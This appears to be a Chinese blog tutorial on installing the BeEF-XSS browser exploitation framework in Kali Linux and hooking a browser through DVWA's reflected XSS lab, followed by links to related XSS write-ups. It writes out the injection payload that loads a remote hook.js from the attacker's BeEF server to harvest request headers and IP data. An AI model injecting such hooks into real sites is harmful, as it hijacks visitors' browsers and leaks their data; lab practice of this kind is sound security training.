在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-[/home/kali]

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
Мартин.20 小时前
[Meachines] [Easy] Sea WonderCMS-XSS-RCE+System Monitor 命令注入
前端·xss
HEX9CF1 天前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
你怎么睡得着的!2 天前
【web安全】——XSS漏洞
安全·web安全·xss
什么鬼昵称2 天前
Pikachu-Cross-Site Scripting-xss之htmlspecialchars
前端·xss
HappyEnd美满结局2 天前
XSS简介
android·前端·xss
什么鬼昵称3 天前
Pikachu-xss防范措施 - href输出 & js输出
前端·xss
什么鬼昵称3 天前
Pikachu-Cross-Site Scripting-xss盲打
前端·xss
什么鬼昵称4 天前
Pikichu-xss实验案例-通过xss获取cookie
前端·xss
什么鬼昵称4 天前
Pikachu-Cross-Site Scripting-DOM型xss_x
前端·xss
什么鬼昵称4 天前
Pikachu-Cross-Site Scripting-存储型xss
前端·xss